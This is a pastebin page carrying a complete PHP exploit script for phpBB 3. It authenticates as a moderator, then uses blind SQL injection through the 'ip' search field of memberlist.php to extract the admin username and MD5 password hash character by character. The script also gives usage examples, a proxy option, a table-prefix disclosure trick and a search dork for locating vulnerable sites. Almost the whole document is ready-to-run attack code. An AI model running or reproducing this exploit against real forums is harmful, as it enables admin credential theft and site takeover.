gnopaste

Sorry for this ugly message. We are searching for some translators.
Please take a look here
Thanks to all translators, you're doing a great job!

Userdata

Name phpbb 3 exploit

Scriptlanguage PHP

Tabwidth 4

Date 02/25/2010 11:40:44 am

IP 84.223.201.244

Description

Michele Papaleo Blog www.michelepapaleo.it

Code   (Hide rownumbers)

1. #!/usr/bin/php -q -d short_open_tag=on
2. <?
3. echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
4. echo "by rgod rgod@autistici.org\n";
5. echo "site: http://retrogod.altervista.org\n";
6. echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
7.  
8. /*
9. works regardless of php.ini settings
10. you need a global moderator account with "simple moderator" role
11. */
12.  
13. if ($argc<5) {
14. echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
15. echo "host:      target server (ip/hostname)\n";
16. echo "path:      path to phpbb3\n";
17. echo "user/pass: u need a valid user account with global moderator rights\n";
18. echo "Options:\n";
19. echo "  -T[prefix]  specify a table prefix different from default (phpbb_)\n";
20. echo "  -p[port]:    specify a port other than 80\n";
21. echo "  -P[ip:port]: specify a proxy\n";
22. echo "  -u[number]:  specify a user id other than 2 (admin)\n";
23. echo "  -x:          disclose table prefix through error messages\n";
24. echo "Example:\r\n";
25. echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
26. echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
27. die;
28. }
29.  
30. error_reporting(0);
31. ini_set("max_execution_time",0);
32. ini_set("default_socket_timeout",5);
33.  
34. function quick_dump($string)
35. {
36.   $result='';$exa='';$cont=0;
37.   for ($i=0; $i<=strlen($string)-1; $i++)
38.   {
39.   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
40.   {$result.="  .";}
41.   else
42.   {$result.="  ".$string[$i];}
43.   if (strlen(dechex(ord($string[$i])))==2)
44.   {$exa.=" ".dechex(ord($string[$i]));}
45.   else
46.   {$exa.=" 0".dechex(ord($string[$i]));}
47.   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
48.   }
49. return $exa."\r\n".$result;
50. }
51. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
52. function sendpacketii($packet)
53. {
54.   global $proxy, $host, $port, $html, $proxy_regex;
55.   if ($proxy=='') {
56.     $ock=fsockopen(gethostbyname($host),$port);
57.     if (!$ock) {
58.       echo 'No response from '.$host.':'.$port; die;
59.     }
60.   }
61.   else {
62.   $c = preg_match($proxy_regex,$proxy);
63.     if (!$c) {
64.       echo 'Not a valid proxy...';die;
65.     }
66.     $parts=explode(':',$proxy);
67.     echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
68.     $ock=fsockopen($parts[0],$parts[1]);
69.     if (!$ock) {
70.       echo 'No response from proxy...';die;
71.   }
72.   }
73.   fputs($ock,$packet);
74.   if ($proxy=='') {
75.     $html='';
76.     while (!feof($ock)) {
77.       $html.=fgets($ock);
78.     }
79.   }
80.   else {
81.     $html='';
82.     while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
83.       $html.=fread($ock,1);
84.     }
85.   }
86.   fclose($ock);
87.   #debug
88.   #echo "\r\n".$html;
89. }
90.  
91. $host=$argv[1];
92. $path=$argv[2];
93. $user=$argv[3];
94. $pass=$argv[4];
95. $port=80;
96. $prefix="PHPBB_";
97. $user_id="2";//admin
98. $discl=0;
99. $proxy="";
100. for ($i=3; $i<=$argc-1; $i++){
101. $temp=$argv[$i][0].$argv[$i][1];
102. if ($temp=="-p")
103. {
104.   $port=str_replace("-p","",$argv[$i]);
105. }
106. if ($temp=="-P")
107. {
108.   $proxy=str_replace("-P","",$argv[$i]);
109. }
110. if ($temp=="-T")
111. {
112.   $prefix=str_replace("-T","",$argv[$i]);
113. }
114. if ($temp=="-u")
115. {
116.   $user_id=str_replace("-u","",$argv[$i]);
117. }
118. if ($temp=="-x")
119. {
120.   $discl=1;
121. }
122. }
123.  
124. if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
125. if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
126.  
127. $data="username=".urlencode($user);
128. $data.="&password=".urlencode($pass);
129. $data.="&redirect=index.php";
130. $data.="&login=Login";
131. $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
132. $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
133. $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
134. $packet.="Accept-Encoding: text/plain\r\n";
135. $packet.="Host: ".$host."\r\n";
136. $packet.="Content-Length: ".strlen($data)."\r\n";
137. $packet.="Connection: Close\r\n\r\n";
138. $packet.=$data;
139. sendpacketii($packet);
140. $cookie="";
141. $temp=explode("Set-Cookie: ",$html);
142. for ($i=1; $i<=count($temp)-1; $i++)
143. {
144. $temp2=explode(" ",$temp[$i]);
145. $cookie.=" ".$temp2[0];
146. }
147. if (eregi("_u=1;",$cookie))
148. {
149. //echo $html."\n";//debug
150. //die("Unable to login...");
151. }
152. echo "cookie -> ".$cookie."\r\n";
153. if ($discl)
154. {
155. $sql="'suntzuuuuu";
156. echo "sql -> ".$sql."\n";
157. $sql=urlencode(strtoupper($sql));
158. $data="username=";
159. $data.="&icq=";
160. $data.="&email=";
161. $data.="&aim=";
162. $data.="&joined_select=lt";
163. $data.="&joined=";
164. $data.="&yahoo=";
165. $data.="&active_select=lt";
166. $data.="&active=";
167. $data.="&msn=";
168. $data.="&count_select=eq";
169. $data.="&count=";
170. $data.="&jabber=";
171. $data.="&sk=c";
172. $data.="&sd=a";
173. $data.="&ip=".$sql;
174. $data.="&search_group_id=0";
175. $data.="&submit=Search";
176. $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
177. $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
178. $packet.="Host: ".$host."\r\n";
179. $packet.="Content-Length: ".strlen($data)."\r\n";
180. $packet.="Connection: Close\r\n";
181. $packet.="Cookie: ".$cookie." \r\n\r\n";
182. $packet.=$data;
183. sendpacketii($packet);
184. if (strstr($html,"You have an error in your SQL syntax"))
185. {
186. $temp=explode("posts",$html);
187. $temp2=explode(" ",$temp[0]);
188. $prefix=strtoupper($temp2[count($temp2)-1]);
189. echo "prefix -> ".$prefix."\n";sleep(2);
190. }
191. }
192.  
193. $md5s[0]=0;//null
194. $md5s=array_merge($md5s,range(48,57)); //numbers
195. $md5s=array_merge($md5s,range(97,102));//a-f letters
196. //print_r(array_values($md5s));
197. $j=1;$password="";
198. while (!strstr($password,chr(0)))
199. {
200. for ($i=0; $i<=255; $i++)
201. {
202. if (in_array($i,$md5s))
203. {
204.   $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
205.   echo "sql -> ".$sql."\n";
206.   $sql=urlencode(strtoupper($sql));
207.   $data="username=";
208.   $data.="&icq=";
209.   $data.="&email=";
210.   $data.="&aim=";
211.   $data.="&joined_select=lt";
212.   $data.="&joined=";
213.   $data.="&yahoo=";
214.   $data.="&active_select=lt";
215.   $data.="&active=";
216.   $data.="&msn=";
217.   $data.="&count_select=eq";
218.   $data.="&count=";
219.   $data.="&jabber=";
220.   $data.="&sk=c";
221.   $data.="&sd=a";
222.   $data.="&ip=".$sql;
223.   $data.="&search_group_id=0";
224.   $data.="&submit=Search";
225.   $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
226.   $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
227.   $packet.="Host: ".$host."\r\n";
228.   $packet.="Content-Length: ".strlen($data)."\r\n";
229.   $packet.="Connection: Close\r\n";
230.   $packet.="Cookie: ".$cookie." \r\n\r\n";
231.   $packet.=$data;
232.   sendpacketii($packet);
233.   if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
234.   }
235.   if ($i==255) {die("Exploit failed...");}
236. }
237. $j++;
238. }
239.  
240. $j=1;$admin="";
241. while (!strstr($admin,chr(0)))
242. {
243. for ($i=0; $i<=255; $i++)
244. {
245.   $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
246.   echo "sql -> ".$sql."\n";
247.   $sql=urlencode(strtoupper($sql));
248.   $data="username=";
249.   $data.="&icq=";
250.   $data.="&email=";
251.   $data.="&aim=";
252.   $data.="&joined_select=lt";
253.   $data.="&joined=";
254.   $data.="&yahoo=";
255.   $data.="&active_select=lt";
256.   $data.="&active=";
257.   $data.="&msn=";
258.   $data.="&count_select=eq";
259.   $data.="&count=";
260.   $data.="&jabber=";
261.   $data.="&sk=c";
262.   $data.="&sd=a";
263.   $data.="&ip=".$sql;
264.   $data.="&search_group_id=0";
265.   $data.="&submit=Search";
266.   $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
267.   $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
268.   $packet.="Host: ".$host."\r\n";
269.   $packet.="Content-Length: ".strlen($data)."\r\n";
270.   $packet.="Connection: Close\r\n";
271.   $packet.="Cookie: ".$cookie." \r\n\r\n";
272.   $packet.=$data;
273.   sendpacketii($packet);
274.   if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
275.   }
276.   if ($i==255) {die("Exploit failed...");}
277. $j++;
278. }
279. echo "--------------------------------------------------------------------\r\n";
280. echo "admin          -> ".$admin."\r\n";
281. echo "password (md5) -> ".$password."\r\n";
282. echo "--------------------------------------------------------------------\r\n";
283.  
284. function is_hash($hash)
285. {
286. if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
287. else {return false;}
288. }
289.  
290. if (is_hash($password)) {echo "Exploit succeeded...";}
291. else {echo "Exploit failed...";}
292. ?>

submitter » gnopaster | imprint « imprint     
» Terms of use «


Donate via Bitcoin:

© 2004-2012 by project-mindstorm IT Services - powered by gnopaste-ng v0.5.5
generated in 0.782s - valid xhtml & css